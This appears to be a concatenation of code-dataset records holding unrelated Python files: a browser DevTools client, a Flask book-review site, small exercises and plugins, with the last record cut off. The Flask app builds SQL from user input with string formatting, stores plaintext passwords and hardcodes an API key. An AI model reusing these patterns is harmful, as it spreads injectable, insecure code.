zipfile.ZipFile(self.path_base + '_bodies.zip', 'w',\n zipfile.ZIP_DEFLATED)\n path = os.path.join(self.task['dir'], 'bodies')\n if not os.path.isdir(path):\n os.makedirs(path)\n index = 0\n for request_id in requests:\n request = requests[request_id]\n if 'status' in request and \\\n request['status'] == 200 and \\\n 'response_headers' in request:\n content_length = self.get_header_value(request['response_headers'],\n 'Content-Length')\n if content_length is not None:\n content_length = int(re.search(r'\\d+', str(content_length)).group())\n elif 'transfer_size' in request:\n content_length = request['transfer_size']\n if content_length > 0:\n body_file_path = os.path.join(path, request_id)\n if not os.path.exists(body_file_path):\n # Only grab bodies needed for optimization checks\n # or if we are saving full bodies\n need_body = False\n content_type = self.get_header_value(request['response_headers'],\n 'Content-Type')\n content_encoding = self.get_header_value(request['response_headers'],\n 'Content-Encoding')\n is_image = False\n is_text = False\n is_video = False\n if content_type is not None:\n content_type = content_type.lower()\n if content_type[:6] or \\\n content_type.find('javascript') >= 0 or \\\n content_type.find('json') >= 0:\n is_text = True\n if content_type[:6] == 'image/':\n is_image = True\n if content_type[:6] == 'video/':\n is_video = True\n is_compressed = False\n if content_encoding is not None:\n content_encoding = content_encoding.lower()\n if content_encoding.find('gzip') >= 0 or \\\n content_encoding.find('deflate') >= 0 or \\\n content_encoding.find('br') >= 0:\n is_compressed = True\n if not optimization_checks_disabled:\n if is_image and content_length >= 1400:\n need_body = True\n if not is_compressed and not is_video and content_length >= 1400:\n need_body = True\n if zip_file is not None and is_text:\n need_body = True\n if need_body:\n response = self.send_command(\"Network.getResponseBody\",\n {'requestId': request_id}, wait=True)\n if response is None or 'result' not in response or \\\n 'body' not in response['result']:\n logging.warning('Missing response body for request %s',\n request_id)\n elif len(response['result']['body']):\n # Write the raw body to a file (all bodies)\n if 'base64Encoded' in response['result'] and \\\n response['result']['base64Encoded']:\n with open(body_file_path, 'wb') as body_file:\n body_file.write(\n base64.b64decode(response['result']['body']))\n else:\n body = response['result']['body'].encode('utf-8')\n with open(body_file_path, 'wb') as body_file:\n body_file.write(body)\n # Add text bodies to the zip archive\n if zip_file is not None:\n index += 1\n name = '{0:03d}-{1}-body.txt'.format(index, request_id)\n zip_file.writestr(name, body)\n if zip_file is not None:\n zip_file.close()\n\n def get_requests(self):\n \"\"\"Get a dictionary of all of the requests and the details (headers, body file)\"\"\"\n requests = None\n if self.requests:\n body_path = os.path.join(self.task['dir'], 'bodies')\n for request_id in self.requests:\n if 'fromNet' in self.requests[request_id] and self.requests[request_id]['fromNet']:\n events = self.requests[request_id]\n request = {'id': request_id}\n # See if we have a body\n body_file_path = os.path.join(body_path, request_id)\n if os.path.isfile(body_file_path):\n request['body'] = body_file_path\n # Get the headers from responseReceived\n if 'response' in events:\n response = events['response'][-1]\n if 'response' in response:\n if 'url' in response['response']:\n request['url'] = response['response']['url']\n if 'status' in response['response']:\n request['status'] = response['response']['status']\n if 'headers' in response['response']:\n request['response_headers'] = response['response']['headers']\n if 'requestHeaders' in response['response']:\n request['request_headers'] = response['response']['requestHeaders']\n if 'connectionId' in response['response']:\n request['connection'] = response['response']['connectionId']\n # Fill in any missing details from the requestWillBeSent event\n if 'request' in events:\n req = events['request'][-1]\n if 'request' in req:\n if 'url' not in request and 'url' in req['request']:\n request['url'] = req['request']['url']\n if 'request_headers' not in request and 'headers' in req['request']:\n request['request_headers'] = req['request']['headers']\n # Get the response length from the data events\n if 'finished' in events and 'encodedDataLength' in events['finished']:\n request['transfer_size'] = events['finished']['encodedDataLength']\n elif 'data' in events:\n transfer_size = 0\n for data in events['data']:\n if 'encodedDataLength' in data:\n transfer_size += data['encodedDataLength']\n elif 'dataLength' in data:\n transfer_size += data['dataLength']\n request['transfer_size'] = transfer_size\n\n if requests is None:\n requests = {}\n requests[request_id] = request\n return requests\n\n def flush_pending_messages(self):\n \"\"\"Clear out any pending websocket messages\"\"\"\n if self.websocket:\n try:\n while True:\n raw = self.websocket.get_message(0)\n if raw is not None and len(raw):\n logging.debug(raw[:200])\n msg = json.loads(raw)\n self.process_message(msg)\n if not raw:\n break\n except Exception:\n pass\n\n def send_command(self, method, params, wait=False, timeout=30):\n \"\"\"Send a raw dev tools message and optionally wait for the response\"\"\"\n ret = None\n if self.websocket:\n self.command_id += 1\n msg = {'id': self.command_id, 'method': method, 'params': params}\n try:\n out = json.dumps(msg)\n logging.debug(\"Sending: %s\", out)\n self.websocket.send(out)\n if wait:\n end_time = monotonic.monotonic() + timeout\n while ret is None and monotonic.monotonic() < end_time:\n try:\n raw = self.websocket.get_message(1)\n if raw is not None and len(raw):\n logging.debug(raw[:200])\n msg = json.loads(raw)\n self.process_message(msg)\n if 'id' in msg and \\\n int(re.search(r'\\d+', str(msg['id'])).group()) == \\\n self.command_id:\n ret = msg\n except Exception:\n pass\n except Exception as err:\n logging.critical(\"Websocket send error: %s\", err.__str__())\n return ret\n\n def wait_for_page_load(self):\n \"\"\"Wait for the page load and activity to finish\"\"\"\n if self.websocket:\n start_time = monotonic.monotonic()\n end_time = start_time + self.task['time_limit']\n done = False\n while not done:\n try:\n raw = self.websocket.get_message(1)\n if raw is not None and len(raw):\n logging.debug(raw[:200])\n msg = json.loads(raw)\n self.process_message(msg)\n except Exception:\n # ignore timeouts when we're in a polling read loop\n pass\n now = monotonic.monotonic()\n elapsed_test = now - start_time\n if now >= end_time:\n done = True\n # only consider it an error if we didn't get a page load event\n if self.page_loaded is None:\n self.task['error'] = \"Page Load Timeout\"\n elif 'time' not in self.job or elapsed_test > self.job['time']:\n elapsed_activity = now - self.last_activity\n elapsed_page_load = now - self.page_loaded if self.page_loaded else 0\n if elapsed_page_load >= 1 and elapsed_activity >= self.task['activity_time']:\n done = True\n elif self.task['error'] is not None:\n done = True\n\n def grab_screenshot(self, path, png=True, resize=0):\n \"\"\"Save the screen shot (png or jpeg)\"\"\"\n response = self.send_command(\"Page.captureScreenshot\", {}, wait=True, timeout=5)\n if response is not None and 'result' in response and 'data' in response['result']:\n resize_string = '' if not resize else '-resize {0:d}x{0:d} '.format(resize)\n if png:\n with open(path, 'wb') as image_file:\n image_file.write(base64.b64decode(response['result']['data']))\n # Fix png issues\n cmd = 'mogrify -format png -define png:color-type=2 '\\\n '-depth 8 {0}\"{1}\"'.format(resize_string, path)\n logging.debug(cmd)\n subprocess.call(cmd, shell=True)\n self.crop_screen_shot(path)\n else:\n tmp_file = path + '.png'\n with open(tmp_file, 'wb') as image_file:\n image_file.write(base64.b64decode(response['result']['data']))\n self.crop_screen_shot(tmp_file)\n command = 'convert \"{0}\" {1}-quality {2:d} \"{3}\"'.format(\n tmp_file, resize_string, self.job['iq'], path)\n logging.debug(command)\n subprocess.call(command, shell=True)\n if os.path.isfile(tmp_file):\n try:\n os.remove(tmp_file)\n except Exception:\n pass\n\n def colors_are_similar(self, color1, color2, threshold=15):\n \"\"\"See if 2 given pixels are of similar color\"\"\"\n similar = True\n delta_sum = 0\n for value in xrange(3):\n delta = abs(color1[value] - color2[value])\n delta_sum += delta\n if delta > threshold:\n similar = False\n if delta_sum > threshold:\n similar = False\n return similar\n\n def crop_screen_shot(self, path):\n \"\"\"Crop to the viewport (for mobile tests)\"\"\"\n if not self.options.android and 'mobile' in self.job and self.job['mobile']:\n try:\n # detect the viewport if we haven't already\n if self.mobile_viewport is None:\n from PIL import Image\n image = Image.open(path)\n width, height = image.size\n pixels = image.load()\n background = pixels[10, 10]\n viewport_width = None\n viewport_height = None\n x_pos = 10\n y_pos = 10\n while viewport_width is None and x_pos < width:\n pixel_color = pixels[x_pos, y_pos]\n if not self.colors_are_similar(background, pixel_color):\n viewport_width = x_pos\n else:\n x_pos += 1\n if viewport_width is None:\n viewport_width = width\n x_pos = 10\n while viewport_height is None and y_pos < height:\n pixel_color = pixels[x_pos, y_pos]\n if not self.colors_are_similar(background, pixel_color):\n viewport_height = y_pos\n else:\n y_pos += 1\n if viewport_height is None:\n viewport_height = height\n self.mobile_viewport = '{0:d}x{1:d}+0+0'.format(viewport_width, viewport_height)\n logging.debug('Mobile viewport found: %s in %dx%d screen shot',\n self.mobile_viewport, width, height)\n if self.mobile_viewport is not None:\n command = 'mogrify -crop {0} \"{1}\"'.format(self.mobile_viewport, path)\n logging.debug(command)\n subprocess.call(command, shell=True)\n except Exception:\n pass\n\n def execute_js(self, script):\n \"\"\"Run the provided JS in the browser and return the result\"\"\"\n ret = None\n response = self.send_command(\"Runtime.evaluate\",\n {'expression': script, 'returnByValue': True},\n wait=True)\n if response is not None and 'result' in response and\\\n 'result' in response['result'] and\\\n 'value' in response['result']['result']:\n ret = response['result']['result']['value']\n return ret\n\n def process_message(self, msg):\n \"\"\"Process an inbound dev tools message\"\"\"\n if 'method' in msg and self.recording:\n parts = msg['method'].split('.')\n if len(parts) >= 2:\n category = parts[0]\n event = parts[1]\n if category == 'Page':\n self.process_page_event(event, msg)\n self.log_dev_tools_event(msg)\n elif category == 'Network':\n self.process_network_event(event, msg)\n self.log_dev_tools_event(msg)\n elif category == 'Inspector':\n self.process_inspector_event(event)\n else:\n self.log_dev_tools_event(msg)\n\n def process_page_event(self, event, msg):\n \"\"\"Process Page.* dev tools events\"\"\"\n if event == 'loadEventFired':\n self.page_loaded = monotonic.monotonic()\n elif event == 'frameStartedLoading' and 'params' in msg and 'frameId' in msg['params']:\n if self.is_navigating and self.main_frame is None:\n self.is_navigating = False\n self.main_frame = msg['params']['frameId']\n if self.main_frame == msg['params']['frameId']:\n logging.debug(\"Navigating main frame\")\n self.last_activity = monotonic.monotonic()\n self.page_loaded = None\n elif event == 'frameStoppedLoading' and 'params' in msg and 'frameId' in msg['params']:\n if self.main_frame is not None and \\\n not self.page_loaded and \\\n self.main_frame == msg['params']['frameId']:\n if self.nav_error is not None:\n self.task['error'] = self.nav_error\n logging.debug(\"Page load failed: %s\", self.nav_error)\n self.page_loaded = monotonic.monotonic()\n elif event == 'javascriptDialogOpening':\n self.task['error'] = \"Page opened a modal dailog\"\n\n def process_network_event(self, event, msg):\n \"\"\"Process Network.* dev tools events\"\"\"\n if not self.task['stop_at_onload']:\n self.last_activity = monotonic.monotonic()\n if 'requestId' in msg['params']:\n request_id = msg['params']['requestId']\n if request_id not in self.requests:\n request = {'id': request_id}\n self.requests[request_id] = request\n if event == 'requestWillBeSent':\n if 'request' not in self.requests[request_id]:\n self.requests[request_id]['request'] = []\n self.requests[request_id]['request'].append(msg['params'])\n self.requests[request_id]['fromNet'] = True\n if self.main_frame is not None and \\\n self.main_request is None and \\\n 'frameId' in msg['params'] and \\\n msg['params']['frameId'] == self.main_frame:\n logging.debug('Main request detected')\n self.main_request = request_id\n elif event == 'resourceChangedPriority':\n if 'priority' not in self.requests[request_id]:\n self.requests[request_id]['priority'] = []\n self.requests[request_id]['priority'].append(msg['params'])\n elif event == 'requestServedFromCache':\n self.requests[request_id]['fromNet'] = False\n elif event == 'responseReceived':\n if 'response' not in self.requests[request_id]:\n self.requests[request_id]['response'] = []\n self.requests[request_id]['response'].append(msg['params'])\n if 'response' in msg['params'] and \\\n 'fromDiskCache' in msg['params']['response'] and \\\n msg['params']['response']['fromDiskCache']:\n self.requests[request_id]['fromNet'] = False\n elif event == 'dataReceived':\n if 'data' not in self.requests[request_id]:\n self.requests[request_id]['data'] = []\n self.requests[request_id]['data'].append(msg['params'])\n elif event == 'loadingFinished':\n self.requests[request_id]['finished'] = msg['params']\n elif event == 'loadingFailed':\n self.requests[request_id]['failed'] = msg['params']\n if self.main_request is not None and \\\n request_id == self.main_request and \\\n 'errorText' in msg['params'] and \\\n 'canceled' in msg['params'] and \\\n not msg['params']['canceled']:\n self.nav_error = msg['params']['errorText']\n logging.debug('Navigation error: %s', self.nav_error)\n\n def process_inspector_event(self, event):\n \"\"\"Process Inspector.* dev tools events\"\"\"\n if event == 'detached':\n self.task['error'] = 'Inspector detached, possibly crashed.'\n elif event == 'targetCrashed':\n self.task['error'] = 'Browser crashed.'\n\n def log_dev_tools_event(self, msg):\n \"\"\"Log the dev tools events to a file\"\"\"\n if self.task['log_data']:\n if self.dev_tools_file is None:\n path = self.path_base + '_devtools.json.gz'\n self.dev_tools_file = gzip.open(path, 'wb', 7)\n self.dev_tools_file.write(\"[{}\")\n if self.dev_tools_file is not None:\n self.dev_tools_file.write(\",\\n\")\n self.dev_tools_file.write(json.dumps(msg))\n\n def get_header_value(self, headers, name):\n \"\"\"Get the value for the requested header\"\"\"\n value = None\n if headers:\n if name in headers:\n value = headers[name]\n else:\n find = name.lower()\n for header_name in headers:\n check = header_name.lower()\n if check == find or (check[0] == ':' and check[1:] == find):\n value = headers[header_name]\n break\n return value\n\n def bytes_from_range(self, text, range_info):\n \"\"\"Convert a line/column start and end into a byte count\"\"\"\n byte_count = 0\n try:\n lines = text.splitlines()\n line_count = len(lines)\n start_line = range_info['startLine']\n end_line = range_info['endLine']\n if start_line > line_count or end_line > line_count:\n return 0\n start_column = range_info['startColumn']\n end_column = range_info['endColumn']\n if start_line == end_line:\n byte_count = end_column - start_column + 1\n else:\n # count the whole lines between the partial start and end lines\n if end_line > start_line + 1:\n for row in xrange(start_line + 1, end_line):\n byte_count += len(lines[row])\n byte_count += len(lines[start_line][start_column:])\n byte_count += end_column\n except Exception:\n pass\n return byte_count\n\nclass DevToolsClient(WebSocketClient):\n \"\"\"DevTools Websocket client\"\"\"\n def __init__(self, url, protocols=None, extensions=None, heartbeat_freq=None,\n ssl_options=None, headers=None):\n WebSocketClient.__init__(self, url, protocols, extensions, heartbeat_freq,\n ssl_options, headers)\n self.connected = False\n self.messages = Queue.Queue()\n self.trace_file_path = None\n self.trace_file = None\n self.video_prefix = None\n self.trace_ts_start = None\n self.trace_data = re.compile(r'method\"\\s*:\\s*\"Tracing.dataCollected')\n self.trace_done = re.compile(r'method\"\\s*:\\s*\"Tracing.tracingComplete')\n\n def opened(self):\n \"\"\"Websocket interface - connection opened\"\"\"\n logging.debug(\"DevTools websocket connected\")\n self.connected = True\n\n def closed(self, code, reason=None):\n \"\"\"Websocket interface - connection closed\"\"\"\n logging.debug(\"DevTools websocket disconnected\")\n self.connected = False\n\n def received_message(self, raw):\n \"\"\"Websocket interface - message received\"\"\"\n try:\n if raw.is_text:\n message = raw.data.decode(raw.encoding) if raw.encoding is not None else raw.data\n compare = message[:50]\n is_trace_data = False\n if self.trace_file_path is not None and self.trace_data.search(compare):\n is_trace_data = True\n msg = json.loads(message)\n self.messages.put('{\"method\":\"got_message\"}')\n if msg is not None:\n self.process_trace_event(msg)\n elif self.trace_file is not None and self.trace_done.search(compare):\n self.trace_file.write(\"\\n]}\")\n self.trace_file.close()\n self.trace_file = None\n if not is_trace_data:\n self.messages.put(message)\n except Exception:\n pass\n\n def get_message(self, timeout):\n \"\"\"Wait for and return a message from the queue\"\"\"\n message = None\n try:\n if timeout is None or timeout <= 0:\n message = self.messages.get_nowait()\n else:\n message = self.messages.get(True, timeout)\n self.messages.task_done()\n except Exception:\n pass\n return message\n\n def start_processing_trace(self, trace_file, video_prefix):\n \"\"\"Write any trace events to the given file\"\"\"\n self.trace_ts_start = None\n self.trace_file_path = trace_file\n self.video_prefix = video_prefix\n\n def stop_processing_trace(self):\n \"\"\"All done\"\"\"\n self.trace_ts_start = None\n self.trace_file_path = None\n if self.trace_file is not None:\n self.trace_file.close()\n self.trace_file = None\n\n def process_trace_event(self, msg):\n \"\"\"Process Tracing.* dev tools events\"\"\"\n if 'params' in msg and 'value' in msg['params'] and len(msg['params']['value']):\n if self.trace_file is None:\n self.trace_file = open(self.trace_file_path, 'wb')\n self.trace_file.write('{\"traceEvents\":[{}')\n # write out the trace events one-per-line but pull out any\n # devtools screenshots as separate files.\n if self.trace_file is not None:\n trace_events = msg['params']['value']\n for _, trace_event in enumerate(trace_events):\n is_screenshot = False\n if self.video_prefix is not None and 'cat' in trace_event and \\\n 'name' in trace_event and 'ts' in trace_event:\n if self.trace_ts_start is None and \\\n trace_event['name'] == 'navigationStart' and \\\n trace_event['cat'].find('blink.user_timing') > -1:\n self.trace_ts_start = trace_event['ts']\n if trace_event['name'] == 'Screenshot' and \\\n trace_event['cat'].find('devtools.screenshot') > -1:\n is_screenshot = True\n if self.trace_ts_start is not None and \\\n 'args' in trace_event and \\\n 'snapshot' in trace_event['args']:\n ms_elapsed = int(round(float(trace_event['ts'] - \\\n self.trace_ts_start) / 1000.0))\n if ms_elapsed >= 0:\n path = '{0}{1:06d}.png'.format(self.video_prefix, ms_elapsed)\n with open(path, 'wb') as image_file:\n image_file.write(\n base64.b64decode(trace_event['args']['snapshot']))\n if not is_screenshot:\n self.trace_file.write(\",\\n\")\n self.trace_file.write(json.dumps(trace_event))\n logging.debug(\"Processed %d trace events\", len(msg['params']['value']))\n","sub_path":"internal/devtools.py","file_name":"devtools.py","file_ext":"py","file_size_in_byte":40775,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"66"} +{"seq_id":"203934243","text":"import os\nimport requests\n\nfrom flask import Flask, session, render_template, request, jsonify\nfrom flask_session import Session\nfrom sqlalchemy import create_engine\nfrom sqlalchemy.orm import scoped_session, sessionmaker\n\napp = Flask(__name__)\n\n# Check for environment variable\nif not os.getenv(\"DATABASE_URL\"):\n raise RuntimeError(\"DATABASE_URL is not set\")\n\n# Configure session to use filesystem\napp.config[\"SESSION_PERMANENT\"] = False\napp.config[\"SESSION_TYPE\"] = \"filesystem\"\nSession(app)\n\n# Set up database\nengine = create_engine(os.getenv(\"DATABASE_URL\"))\ndb = scoped_session(sessionmaker(bind=engine))\n\n\n@app.route(\"/\", methods = [\"GET\"])\ndef index():\n return render_template(\"index.html\")\n\n@app.route(\"/register\", methods = [\"GET\", \"POST\"])\ndef register():\n if request.method == \"GET\":\n return render_template(\"register.html\")\n elif request.method == \"POST\":\n \"\"\"Register to the website\"\"\"\n # Get form information.\n name = request.form.get(\"name\").capitalize()\n pw = request.form.get(\"pw\")\n email = request.form.get(\"email\")\n # Make sure the username is unique.\n if db.execute(\"SELECT * FROM users WHERE name = :name\", {\"name\":name}).rowcount == 0:\n db.execute(\"INSERT INTO users (name, email, password) VALUES (:name, :email, :password)\", {\"name\":name, \"email\":email, \"password\":pw})\n db.commit()\n return render_template(\"success.html\", message=\"You've succesfully created your account.\")\n return render_template(\"error.html\", message=\"Please choose a different username.\")\n\n@app.route(\"/login\", methods = [\"GET\", \"POST\"])\ndef login():\n if request.method == \"GET\":\n return render_template(\"login.html\")\n elif request.method == \"POST\":\n name = request.form.get(\"name\").capitalize()\n pw = request.form.get(\"pw\")\n if db.execute(\"SELECT * FROM users WHERE name = :name AND password = :password\", {\"name\":name, \"password\":pw}).rowcount != 0:\n session[\"username\"] = name\n return render_template(\"search.html\")\n return render_template(\"error.html\", message=\"Incorrect Username And/Or Password.\")\n\n@app.route(\"/dashboard\", methods=[\"GET\"])\ndef dashboard():\n return render_template(\"search.html\")\n\n@app.route(\"/logout\")\ndef logout():\n session[\"username\"] = None\n return render_template(\"success.html\", message=\"You've successfully logged out.\")\n\n@app.route(\"/results\", methods = [\"GET\", \"POST\"])\ndef results():\n searchFor = request.form.get(\"userInput\").title()\n data = db.execute(\"SELECT isbn, title, author FROM books WHERE isbn LIKE '%{}%' OR title LIKE '%{}%' OR author LIKE'%{}%' LIMIT 5\".format(searchFor, searchFor,searchFor)).fetchall()\n\n if data == []:\n return render_template(\"error.html\", message=\"Couldn't find anything :(\")\n return render_template(\"results.html\", data = data)\n\n@app.route(\"/books/\", methods = [\"GET\", \"POST\"])\ndef books(isbn):\n root = request.script_root\n isbn += root\n book_info = db.execute(\"SELECT isbn, title, author, year FROM books WHERE isbn = '{}'\".format(isbn)).fetchall()\n reviews = db.execute(\"SELECT rating, review, name FROM reviews WHERE isbn = '{}'\".format(isbn)).fetchall()\n\n res = requests.get(\"https://www.goodreads.com/book/review_counts.json\", params={\"key\": \"f7ZWmLq8xqWyHrFkqcd0Q\", \"isbns\": f\"{isbn}\"})\n data = res.json()\n avg_rating = data[\"books\"][0][\"average_rating\"]\n rating_count = data[\"books\"][0][\"work_ratings_count\"]\n\n if request.method == \"GET\":\n return render_template(\"books.html\", reviews = reviews, book_info = book_info, isbn = isbn, avg_rating = avg_rating, rating_count = rating_count)\n\n elif request.method == \"POST\":\n name = session.get(\"username\")\n review = request.form.get(\"comment\")\n rating = request.form.get(\"rate\")\n message = \"said:\"\n if db.execute(\"SELECT * FROM reviews WHERE name = :name AND isbn = :isbn\", {\"name\":name, \"isbn\":isbn}).rowcount == 0:\n save_review = db.execute(\"INSERT INTO reviews (rating, review, name, isbn) VALUES (:rating, :review, :name, :isbn)\",{\"rating\":rating, \"review\":review, \"name\":name, \"isbn\":isbn})\n db.commit()\n error_msg = \"\"\n else:\n error_msg = \"You can only submit one review per book.\"\n\n return render_template(\"books.html\", review = review, name = name, rating = rating, isbn = isbn, book_info = book_info, message = message, reviews = reviews, error_msg=error_msg, avg_rating = avg_rating, rating_count = rating_count)\n\n@app.route(\"/api/\", methods = [\"GET\"])\ndef api(isbn):\n isbn = str(isbn)\n book = db.execute(\"SELECT title, author, year, isbn FROM books WHERE isbn = :isbn\", {\"isbn\":isbn})\n reviews = db.execute(\"SELECT COUNT(*) FROM reviews WHERE isbn = :isbn\", {\"isbn\":isbn}).fetchall()\n if book.rowcount == 0:\n return jsonify({\"error\":\"Invalid isbn\"}), 404\n else:\n book = book.fetchall()\n return jsonify({\n \"title\":f\"{book[0][0]}\",\n \"author\":f\"{book[0][1]}\",\n \"year\":f\"{book[0][2]}\",\n \"isbn\":f\"{book[0][3]}\",\n \"review_count\":f\"{reviews[0][0]}\"\n })\n","sub_path":"application.py","file_name":"application.py","file_ext":"py","file_size_in_byte":5222,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"66"} +{"seq_id":"368007568","text":"\"\"\"\n 队列的顺序存储\n 思路:1。基于列表完成数据存储\n 2。通过封装规定数据操作\n\"\"\"\n\n\nclass QueueError(Exception):\n pass\n\n\nclass SQueue:\n def __init__(self):\n self._elems = []\n\n def is_empty(self):\n return self._elems == []\n\n def enqueue(self, val):\n \"\"\"\n 入队\n :param val:\n :return:\n \"\"\"\n self._elems.append(val)\n\n def dequeue(self):\n if not self._elems:\n raise QueueError('empty')\n return self._elems.pop(0)\n\n\nif __name__ == '__main__':\n sq = SQueue()\n sq.enqueue(10)\n sq.enqueue(20)\n sq.enqueue(30)\n \"\"\"\n 经典题目 ,队列反转\n \"\"\"\n from sstack import *\n st=SStack()\n\n while not sq.is_empty():\n st.push(sq.dequeue())\n while not st.is_empty():\n sq.enqueue(st.pop())\n\n while not sq.is_empty():\n print(sq.dequeue())\n","sub_path":"python_study/data_struct/squeue.py","file_name":"squeue.py","file_ext":"py","file_size_in_byte":923,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"66"} +{"seq_id":"273901999","text":"import re\nimport os\nimport sublime\nimport sublime_plugin\n\nfrom Default.paragraph import expand_to_paragraph\n\n# TODO: Add support for tab and mixed tab-space indents\n\n#------------------------------------------------------------------------------\n#\n# Plugin\n#\n#------------------------------------------------------------------------------\n\n\n#\n# Returns the valid prefix of 's'\n#\ndef match_token(s):\n s = s.lstrip()\n l = len(s)\n for i in range(l):\n # Only check the first two characters\n if i >= 2:\n break\n c = s[i]\n if c == \"-\":\n return c\n if c == \"*\":\n return c\n if c == \">\":\n if i + 1 < l and c == s[i + 1]:\n return \">>\"\n return c\n if c == \"#\":\n return c\n if c == \"/\":\n if i + 1 < l and c == s[i + 1]:\n return \"//\"\n if c == \"~\":\n return c\n return \"\"\n\n#\n# Escapes 't'\n#\ndef escape(t):\n if t == \"*\":\n return \"\\*\"\n return t\n\n#\n# Returns the number of leading spaces in 's'\n#\ndef lspace(s):\n i = 0\n while i < len(s) and s[i] == \" \":\n i += 1\n return i\n\n#\n# Wraps 'stream' at 'cutoff' (including)\n#\ndef wrap_stream(stream, indent=None, newlines=0, cutoff=80):\n if not indent:\n indent = lspace(stream)\n\n prefix = match_token(stream)\n prefix_indent = indent\n\n stream = re.sub('(\\n)+', ' ', stream)\n stream = re.sub('( )+', ' ', stream)\n stream = re.sub('({})'.format(escape(prefix)), '', stream, 1)\n stream = stream.strip()\n\n if (len(prefix) > 0):\n prefix_indent += len(prefix) + 1\n prefix += \" \"\n\n if len(stream) + prefix_indent < cutoff:\n return \" \" * indent + prefix + stream + \"\\n\"\n\n leader = 1\n block = \"\"\n line = \"\"\n linelen = 0\n for word in stream.split():\n if linelen + prefix_indent + len(word) >= cutoff:\n if not leader:\n block += \" \" * prefix_indent + line.rstrip() + \"\\n\"\n else:\n leader = 0\n block += \" \" * indent + prefix + line.rstrip() + \"\\n\"\n line = \"\"\n linelen = 0\n line += word + \" \"\n linelen += len(word) + 1\n block += \" \" * prefix_indent + line.rstrip()\n\n return block + \"\\n\"\n\n\n#------------------------------------------------------------------------------\n#\n# Sublime\n#\n#------------------------------------------------------------------------------\n\n\ndef get_file_ext(view):\n filepath = view.file_name()\n if filepath != None:\n ext = os.path.splitext(view.file_name())[1]\n if len(ext) != 0:\n return ext\n return None\n\ndef get_wrap_width(view):\n wrap_width = view.settings().get(\"wrap_width\")\n if not wrap_width or wrap_width < 10:\n return 80\n return wrap_width\n\nclass WrapBlock(sublime_plugin.TextCommand):\n def run(self, edit):\n view = self.view\n wrap_width = get_wrap_width(view)\n region = view.sel()[0]\n region = expand_to_paragraph(view, region.begin())\n string = wrap_stream(view.substr(region), cutoff=wrap_width)\n view.replace(edit, sublime.Region(region.begin(), region.end()), string)\n","sub_path":"sublime/plugins/hard-wrap.py","file_name":"hard-wrap.py","file_ext":"py","file_size_in_byte":3212,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"66"} +{"seq_id":"603442711","text":"#!/usr/bin/env python\n\n# Install dependencies, preferably in a virtualenv:\n#\n# pip install flask matplotlib\n#\n# Run the development server:\n#\n# python app.py\n#\n# Go to http://localhost:5000/plot.png and see a plot of random data.\n#\n# based on https://gist.github.com/rduplain/1641344\n \nimport random\nimport cStringIO\n \nfrom flask import Flask, make_response, request\nfrom matplotlib.backends.backend_agg import FigureCanvasAgg as FigureCanvas\nfrom matplotlib.figure import Figure\n \n \napp = Flask(__name__)\n\n\n@app.route('/')\ndef root() :\n return \"
\"\n\n@app.route('/plot.png', methods = ['GET', 'POST'])\ndef plot() :\n fig = Figure()\n axis = fig.add_subplot(1, 1, 1)\n \n if request.method == 'GET' :\n xs = range(100)\n ys = [random.randint(1, 50) for x in xs]\n \n if request.method == 'POST' :\n # assuming posted data looks like '3.3,5.3,6.13,33.4'\n ys = map( float, request.form['data'].strip().split(',') )\n xs = range(len(ys))\n\n axis.plot(xs, ys)\n canvas = FigureCanvas(fig)\n output = cStringIO.StringIO()\n canvas.print_png(output)\n response = make_response(output.getvalue())\n response.mimetype = 'image/png'\n return response\n\n \nif __name__ == '__main__':\n app.run(debug=True)\n","sub_path":"flaskdemo.py","file_name":"flaskdemo.py","file_ext":"py","file_size_in_byte":1364,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"66"} +{"seq_id":"183645137","text":"'''\ncalcular valor a ser pago por um produto com as condições abaixo:\n- a vista dinheiro/cheque 10% desconto\n- a vista cartao 5%\n- em até 2x cartão preço normal\n- 3x ou mais 20% juros\n'''\n\nvalor = float(input('Digite o valor do produto: '))\nprint('''==== Escolha uma das seguintes opções de pagamento ====\nA VISTA DINHEIRO/CHEQUE: digite 1\nA VISTA NO CARTÃO: digite 2\nParcelar em 2x no cartão: Digite 3\nPara parcelar em 3x: Digite 4''')\nopcao = int(input('Digite a opção: '))\nvalorfinal = 0\n\nif opcao == 1:\n valorfinal = valor - (valor * 10 / 100)\nelif opcao == 2:\n valorfinal = valor - (valor * 5 / 100)\nelif opcao == 3:\n valorfinal = valor\nelse:\n valorfinal = valor + (valor * 20 / 100)\n\nprint('O valor final do produto será de: R$ {}'.format(valorfinal))","sub_path":"Curso em Vídeo/exercicios/ex044.py","file_name":"ex044.py","file_ext":"py","file_size_in_byte":781,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"66"} +{"seq_id":"162219831","text":"#!/bin/env python\n\nimport utils\n\ndataset = 'datacommons_feeds'\nsubfolder_path = utils.data_location / 'datacommons_feeds'\ninput_file = subfolder_path / 'source' / 'data.json'\n\ndata = utils.read_json(input_file)\n\nresults = [{'url': el['url'], 'label': 'true', 'source': 'datacommons_feeds'} for el in data['dataFeedElement']]\n\nutils.write_json_with_path(results, subfolder_path, 'urls.json')\n\nby_domain = utils.compute_by_domain(results)\n\nutils.write_json_with_path(by_domain, subfolder_path, 'domains.json')\n","sub_path":"datacommons_feeds.py","file_name":"datacommons_feeds.py","file_ext":"py","file_size_in_byte":508,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"66"} +{"seq_id":"239888931","text":"# Problem 7\n#\n# By listing the first six prime numbers: 2, 3, 5, 7, 11, and 13, we can see\n# that the 6th prime is 13.\n#\n# What is the 10,001st prime number?\n\n# brute force with some small optimizations such as using the primes given in\n# the problem and skipping even numbers\ndef solution1():\n primes = [3, 5, 7, 11, 13]\n n = 17\n for i in range(10001 - len(primes) + 1):\n while any(n % p == 0 for p in primes):\n n += 2 \n primes.append(n)\n return n \n \n# just cheese it and guess using a prime sieve\nfrom eulerlib import sieve_of_eratosthenes\ndef solution2():\n return sieve_of_eratosthenes(1000000)[10000]\n\nprint(solution2())\n","sub_path":"Python/p007.py","file_name":"p007.py","file_ext":"py","file_size_in_byte":669,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"66"} +{"seq_id":"104783479","text":"# -*- coding: utf-8 -*-\n\n\"\"\"\nShift 